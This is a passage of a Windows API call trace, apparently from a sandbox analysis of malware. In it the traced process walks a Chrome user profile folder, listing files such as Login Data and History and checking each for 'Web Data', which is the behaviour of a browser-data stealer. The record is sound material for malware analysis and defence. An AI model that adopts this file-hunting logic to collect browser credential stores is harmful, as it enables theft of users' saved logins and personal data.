(lpString="aohghmighlieiainnegkcijnfilokake") returned 32 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0590.072] LocalAlloc (uFlags=0x40, uBytes=0x158) returned 0x5da218 [0590.072] LocalFree (hMem=0x59f038) returned 0x0 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.073] lstrlenW (lpString="\\*.*") returned 4 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.073] LocalAlloc (uFlags=0x40, uBytes=0x160) returned 0x5da378 [0590.073] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 0x5b9b10 [0590.073] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.073] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 1 [0590.073] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.073] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.073] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 1 [0590.073] lstrcmpiW (lpString1="0.0.0.6_0", lpString2=".") returned 1 [0590.073] lstrcmpiW (lpString1="0.0.0.6_0", lpString2="..") returned 1 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.073] lstrlenW (lpString="\\") returned 1 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.073] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x5da4e0 [0590.073] lstrlenW (lpString="0.0.0.6_0") returned 9 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned 108 [0590.073] LocalAlloc (uFlags=0x40, uBytes=0x16c) returned 0x5da648 [0590.073] LocalFree (hMem=0x5da4e0) returned 0x0 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.073] lstrlenW (lpString="\\*.*") returned 4 [0590.073] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.073] LocalAlloc (uFlags=0x40, uBytes=0x174) returned 0x5da7c0 [0590.073] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\*.*", lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 0x5b9bd0 [0590.080] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.080] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="icon_128.png") returned 12 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x5daab8 [0590.080] LocalFree (hMem=0x5da940) returned 0x0 [0590.080] StrStrIW (lpFirst="icon_128.png", lpSrch="Web Data") returned 0x0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="icon_16.png") returned 11 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x184) returned 0x5d4410 [0590.080] LocalFree (hMem=0x5da940) returned 0x0 [0590.080] StrStrIW (lpFirst="icon_16.png", lpSrch="Web Data") returned 0x0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="main.html") returned 9 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x180) returned 0x5d45a0 [0590.080] LocalFree (hMem=0x5da940) returned 0x0 [0590.080] StrStrIW (lpFirst="main.html", lpSrch="Web Data") returned 0x0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="main.js") returned 7 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x17c) returned 0x5d4728 [0590.080] LocalFree (hMem=0x5da940) returned 0x0 [0590.080] StrStrIW (lpFirst="main.js", lpSrch="Web Data") returned 0x0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="manifest.json") returned 13 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x188) returned 0x5d48b0 [0590.080] LocalFree (hMem=0x5da940) returned 0x0 [0590.080] StrStrIW (lpFirst="manifest.json", lpSrch="Web Data") returned 0x0 [0590.080] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 1 [0590.080] lstrcmpiW (lpString1="__MACOSX", lpString2=".") returned 1 [0590.080] lstrcmpiW (lpString1="__MACOSX", lpString2="..") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] lstrlenW (lpString="\\") returned 1 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.080] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5da940 [0590.080] lstrlenW (lpString="__MACOSX") returned 8 [0590.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.081] LocalAlloc (uFlags=0x40, uBytes=0x17e) returned 0x5d4a40 [0590.081] LocalFree (hMem=0x5da940) returned 0x0 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0590.081] lstrlenW (lpString="\\*.*") returned 4 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0590.081] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x5d4bc8 [0590.081] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX\\*.*", lpFindFileData=0x52d1b4 | out: lpFindFileData=0x52d1b4) returned 0x5b9b90 [0590.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.081] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1b4 | out: lpFindFileData=0x52d1b4) returned 1 [0590.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.081] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1b4 | out: lpFindFileData=0x52d1b4) returned 0 [0590.081] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0590.081] LocalFree (hMem=0x5d4bc8) returned 0x0 [0590.081] LocalFree (hMem=0x5d4a40) returned 0x0 [0590.081] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d430 | out: lpFindFileData=0x52d430) returned 0 [0590.081] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0590.081] LocalFree (hMem=0x5da7c0) returned 0x0 [0590.081] LocalFree (hMem=0x5da648) returned 0x0 [0590.081] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 0 [0590.081] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.081] LocalFree (hMem=0x5da378) returned 0x0 [0590.081] LocalFree (hMem=0x5da218) returned 0x0 [0590.081] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.081] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0590.081] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.081] lstrlenW (lpString="\\") returned 1 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.081] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x59f038 [0590.081] lstrlenW (lpString="Temp") returned 4 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0590.081] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5dac48 [0590.081] LocalFree (hMem=0x59f038) returned 0x0 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0590.081] lstrlenW (lpString="\\*.*") returned 4 [0590.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0590.081] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59f038 [0590.081] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\*.*", lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 0x5b9b10 [0590.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.082] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 1 [0590.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.082] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6ac | out: lpFindFileData=0x52d6ac) returned 0 [0590.082] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.082] LocalFree (hMem=0x59f038) returned 0x0 [0590.082] LocalFree (hMem=0x5dac48) returned 0x0 [0590.082] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.082] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.082] LocalFree (hMem=0x59ef10) returned 0x0 [0590.082] LocalFree (hMem=0x571f10) returned 0x0 [0590.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.082] lstrlenW (lpString="\\") returned 1 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.082] lstrlenW (lpString="Favicons") returned 8 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x571f10 [0590.082] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.082] StrStrIW (lpFirst="Favicons", lpSrch="Web Data") returned 0x0 [0590.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.082] lstrlenW (lpString="\\") returned 1 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.082] lstrlenW (lpString="Favicons-journal") returned 16 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5dac48 [0590.082] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.082] StrStrIW (lpFirst="Favicons-journal", lpSrch="Web Data") returned 0x0 [0590.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.082] lstrlenW (lpString="\\") returned 1 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.082] lstrlenW (lpString="Google Profile.ico") returned 18 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x59ef10 [0590.082] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.082] StrStrIW (lpFirst="Google Profile.ico", lpSrch="Web Data") returned 0x0 [0590.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.082] lstrlenW (lpString="\\") returned 1 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.082] lstrlenW (lpString="History") returned 7 [0590.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.082] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d0f48 [0590.082] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.082] StrStrIW (lpFirst="History", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="History Provider Cache") returned 22 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x5da218 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="History Provider Cache", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="History-journal") returned 15 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x59f040 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="History-journal", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="Login Data") returned 10 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x5da350 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="Login Data", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="Login Data-journal") returned 18 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5da470 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="Login Data-journal", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="Network Action Predictor") returned 24 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56b4e8 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="Network Action Predictor", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="Network Action Predictor-journal") returned 32 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5da5a0 [0590.083] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.083] StrStrIW (lpFirst="Network Action Predictor-journal", lpSrch="Web Data") returned 0x0 [0590.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.083] lstrlenW (lpString="\\") returned 1 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.083] lstrlenW (lpString="Preferences") returned 11 [0590.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.083] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5da6f0 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="Preferences", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="previews_opt_out.db") returned 19 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5da810 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="previews_opt_out.db", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="previews_opt_out.db-journal") returned 27 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56b110 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="previews_opt_out.db-journal", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="README") returned 6 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1060 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="README", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="Secure Preferences") returned 18 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5da940 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="Secure Preferences", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="Shortcuts") returned 9 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5d4a40 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="Shortcuts", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="Shortcuts-journal") returned 17 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x5d4b60 [0590.084] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.084] StrStrIW (lpFirst="Shortcuts-journal", lpSrch="Web Data") returned 0x0 [0590.084] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.084] lstrlenW (lpString="\\") returned 1 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.084] lstrlenW (lpString="Top Sites") returned 9 [0590.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5d4c90 